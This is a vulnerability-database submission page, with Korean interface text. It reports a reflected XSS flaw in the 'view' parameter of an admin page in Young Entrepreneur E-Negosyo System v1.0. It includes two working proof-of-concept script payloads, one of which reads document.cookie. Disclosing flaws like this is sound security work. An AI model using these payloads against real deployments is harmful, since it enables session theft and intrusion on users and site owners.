제출 #106864: Young Entrepreneur E-Negosyo System v1.0 /bsenordering/admin/category/index.php GET parameter view exists XSS vulnerability정보

제목Young Entrepreneur E-Negosyo System v1.0 /bsenordering/admin/category/index.php GET parameter view exists XSS vulnerability
설명An issue was discovered in Young Entrepreneur E-Negosyo System v1.0. There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /bsenordering/admin/category/index.php?view. Payload1:/bsenordering/admin/category/index.php?view=<script>alert(233)</script> Payload2:/bsenordering/admin/category/index.php?view=<script>alert(document.cookie)</script>
원천⚠️ https://github.com/Apeng96/bug_report/blob/main/XSS-1.md
사용자
 aroc (UID 43882)
제출2023. 03. 28. AM 09:43 (3 연령 ago)
모더레이션2023. 03. 28. PM 10:32 (13 hours later)
상태수락
VulDB 항목224243 [SourceCodester Young Entrepreneur E-Negosyo System 1.0 GET Parameter index.php view 크로스 사이트 스크립팅]
포인트들20

이전개요다음

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!